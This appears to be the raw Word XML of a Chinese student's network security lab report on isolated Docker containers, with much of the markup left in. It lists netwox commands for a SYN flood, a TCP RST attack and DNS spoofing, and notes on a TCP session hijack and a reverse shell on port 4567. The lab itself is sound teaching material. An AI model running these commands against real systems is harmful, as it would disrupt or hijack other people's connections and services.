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</w:pPr>
      <w:r>
        <w:t>实验环境中有user、server和user2 3个docker容器，请使用user作为连接server的测试机，user2作为攻击之后验证攻击行为是否成功的验证机。请注意，如果实验失败，请按照user server user2的顺序重启所有容器后再次进行实验。在你认为你的攻击成功后，保持你的攻击程序和脚本持续运行，再点击提交即可。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查看docker容器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150" cy="1906270"/>
            <wp:effectExtent l="0" t="0" r="381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进入容器的命令行docker exec –it 容器名 /bin/bash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关掉SYNCookie保护 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sudo sysctl -w net.ipv4.tcp_syncookies=0 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打开telnet服务并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">查看服务器的连接状态 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◼ netstat –nat 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3590290"/>
            <wp:effectExtent l="0" t="0" r="571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9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一开始user2登录server需要输入账号密码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960" cy="390144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实施攻击 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后从user2用户机telnet服务器，观察发现一直trying无法连接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◼ netwox 76 -i 172.17.0.3 -p 23 –s raw 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4253230"/>
            <wp:effectExtent l="0" t="0" r="1016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5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再次查看服务器的连接状态，比较跟上次的不同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，可以发现连接状态队列满了，而且都是半连接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3573145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7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停止攻击，再次观察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你需要根据实验指导手册仅使用user容器和server容器完成TCP RST攻击实验，由于单次的RST攻击行为检测不易实现，所以本次实验仅针对自动化的持续性攻击进行检测，在你认为你的攻击完成后，请保持攻击程序或脚本持续运行并提交，在提交之后，请在保持攻击程序或脚本运行的前提下使用user再次尝试与server建立TCP连接（请保证不少于5次尝试）。（只针对自动化攻击方式实现了测评）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直接使用命令攻击，点提交后用user 不断telnet server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netwox 78 -d docker0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你需要根据指导手册，完成TCP会话劫持与反向shell实验，实验需要完整完成会话劫持与反向shell，在你认为你的实验完成后，请不要关闭攻击者(虚拟机ubuntu)与受害者(server)的反向shell连接，直接点击提交即可进行相应的判定。（自动化攻击和手动攻击的实现皆可以检测）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请注意：其中反向shell的监听端口需要指定为4567端口！！！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先正向，直接抓包然后用netwox发送命令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写脚本，注意修改port和seq以及ack，还有改命令端口9090为目标端口4567，执行脚本sudo python3，成功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1777365"/>
            <wp:effectExtent l="0" t="0" r="6985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sudo netwox 105 -h "www.hust-cse.com" -H "20.21.9.1" -a "ns.hust-cse.com" -A "20.24.4.9" --filter "dst host 10.10.27.2" --device "br-8f1148536672"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问题：过滤器设置src27.3虚拟机能攻击，但是提交之后通过不了必须得改成上面的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sudo tc qdisc add dev br-8f1148536672 root netem delay 5s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sudo tc qdisc change dev br-8f1148536672 root netem delay 5s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46905" cy="3029585"/>
            <wp:effectExtent l="0" t="0" r="63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690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服了，调整了半天发现是net写错成com了，难怪不发包，无语啊啊啊啊啊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3816350"/>
            <wp:effectExtent l="0" t="0" r="635" b="508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6F47C2E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46F47C2E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ViZWJjMzViZjUzOTdjZWVjOWU2MWI0ZGM4NjIwZjcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="1C70072A"/>
    <w:rsid w:val="756F4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2024-04-08T10:32:00Z</dcterms:created>
  <dc:creator>shiftw</dc:creator>
  <cp:lastModifiedBy>啊呜呼哀</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-30T10:08:08Z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CF963E1305E7468F97886D84CFAF3ABE_12</vt:lpwstr>
  </property>
</Properties>
</file>